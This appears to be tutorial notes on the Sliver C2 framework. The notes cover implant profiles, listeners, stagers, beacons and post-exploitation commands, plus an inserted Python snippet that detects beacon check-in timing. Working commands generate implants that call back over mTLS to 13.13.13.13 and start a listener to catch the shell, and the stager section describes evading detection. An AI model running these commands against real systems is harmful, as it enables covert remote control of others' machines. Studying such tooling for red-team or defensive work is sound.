Implants

PROFILE

Profiles are implant blueprints: a saved configuration defined with the profiles new command and reused later when generating implants. A profile specifies the protocol to use (e.g. --mtls) and a --format; the final argument given without a flag is the profile name (e.g. win-shellcode or dc01-pivot).

sliver > profiles new --mtls 13.13.13.13 --format shellcode win-shellcode
sliver > profiles new --mtls 13.13.13.13:8888 --format exe --arch amd64 --os windows dc01-pivot

Generating an implant from a profile:

sliver > profiles generate dc01-pivot --save /home/user/
To run a profile command, type profiles followed by the command; the command is a sub-command of profiles (for example profiles generate).

LISTENER

Before you can catch the shell, you first need to start a listener. The mtls, http, https, and dns commands start listeners for each protocol, and the jobs command views and manages listeners running in the background. Listeners accept both session and beacon callbacks:

sliver > http -L 13.13.13.13 -l 8088
sliver > jobs
 ID   Name   Protocol   Port    Stage Profile 
==== ====== ========== ======= ===============
 1    grpc   tcp        31337                 
 2    http   tcp        8088

STAGER

Stagers are used to keep the initial payload small, make it appear non-malicious, and avoid detection. This keeps things simple and reduces the complexity of the payloads.

Sliver supports the Meterpreter staging protocol over TCP and HTTP(S). The protocol is straightforward:

  • read the size of the stage 2 payload on the wire (the first 4 bytes for the TCP stager)

  • download the stage 2

  • allocate the size read in the first step, and write the stage in memory

For this to work, we need the following pieces:

  • a staging server (the Sliver server)

  • a stage 2 payload (usually a Sliver shellcode, but can be in other formats)

  • stagers (generated by msfvenom, the Sliver generate stager command, or a custom one)

SESSION

The use command will tab-complete session and beacon identifiers, but you can also type them out if you really want to (identifier prefixes are accepted). Additionally, running the use command with no arguments will enter an interactive menu to select from.

When you are done with the session, run background. The session will of course remain active.

BEACON

Implants in beacon mode use protocols such as mTLS, HTTP(S), or DNS to provide asynchronous C2. Unlike sessions, beacons sleep between callbacks to minimize the network footprint. While --skip-symbols reduces file size by removing obfuscation, it significantly increases the risk of detection by endpoint security solutions.

Upon execution, the beacon registers with the C2 server, which assigns a unique ID to that specific process. This ID persists for the life of the implant. The "Next Check-in" time is calculated from the sleep interval (--seconds 5) plus a random variance (--jitter 3), so there is no predictable heartbeat. Run beacons to track these check-ins in real time and use to connect to one.
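As an added, defender-side example (not from these notes or the Sliver project), the following Python flags sources whose check-in gaps fall into the narrow [sleep, sleep+jitter] band that a --seconds 5 --jitter 3 beacon produces, even though no single gap repeats. The log format, the constructed timestamps, the listener address 13.13.13.13:8088 reused from above, and the spread threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sample log, one "<ISO timestamp> <src_ip> <dst_ip>:<port>" per line.
# 10.0.0.5 behaves like a beacon set to --seconds 5 --jitter 3 (gaps of 5..8 s);
# 10.0.0.9 is ordinary, irregular traffic.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 13.13.13.13:8088
2024-05-01T10:00:06 10.0.0.5 13.13.13.13:8088
2024-05-01T10:00:11 10.0.0.5 13.13.13.13:8088
2024-05-01T10:00:19 10.0.0.5 13.13.13.13:8088
2024-05-01T10:00:26 10.0.0.5 13.13.13.13:8088
2024-05-01T10:00:03 10.0.0.9 13.13.13.13:8088
2024-05-01T10:00:04 10.0.0.9 13.13.13.13:8088
2024-05-01T10:00:40 10.0.0.9 13.13.13.13:8088
2024-05-01T10:01:30 10.0.0.9 13.13.13.13:8088
2024-05-01T10:01:31 10.0.0.9 13.13.13.13:8088
"""
Flow = Tuple[str, str]  # (source, destination)

def parse_log(text: str) -> Dict[Flow, List[datetime]]:
    """Group connection timestamps by (src, dst) flow."""
    flows: Dict[Flow, List[datetime]] = defaultdict(list)
    for line in text.splitlines():
        if line.strip():
            stamp, src, dst = line.split()
            flows[(src, dst)].append(datetime.fromisoformat(stamp))
    return flows

def gaps(times: List[datetime]) -> List[float]:
    """Inter-arrival gaps in seconds, in chronological order."""
    ts = sorted(times)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]

def looks_like_beacon(gap_list: List[float], min_gaps: int = 4,
                      max_spread: float = 5.0) -> bool:
    """Sleep S plus jitter up to J gives gaps in [S, S+J]: a narrow band even
    though no gap repeats. Flag flows with at least min_gaps gaps whose
    max-min spread stays within max_spread seconds (thresholds are assumed)."""
    if len(gap_list) < min_gaps:
        return False
    return max(gap_list) - min(gap_list) <= max_spread

def find_beacons(text: str) -> List[Flow]:
    """Flows in the log whose check-in cadence looks like a jittered beacon."""
    return sorted(flow for flow, times in parse_log(text).items()
                  if looks_like_beacon(gaps(times)))
```

On the constructed log, only the 10.0.0.5 flow is flagged; a longer observation window and a relative (percentage) spread make the check more robust against slow beacons.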

You should see a blue prompt indicating that you are interacting with a beacon rather than a session (red). Commands are executed the same way as in a session, though not all commands are supported in beacon mode.

Tasks will execute in the order they were created (FIFO).

You can view previous tasks executed by the active beacon using the tasks command.

You can use the interactive command to task a beacon to open an interactive session; with no arguments, the current C2 channel is used.

When you are done with the interactive session, use the close command to close it without killing the implant; the beacon keeps performing check-ins while an interactive session is open.

COMMANDS & TOOLS

When connected to a beacon or session, Sliver provides many commands and tools. Type help to list them, and help cat or cat --help for details on a specific command. Some commands only work on certain operating systems; others work everywhere.

Download

Downloaded directories are packed into a .tar.gz archive.

Upload

execute-assembly

execute-assembly lets you run .NET binaries on the target machine without uploading them. Note that it spawns a child process.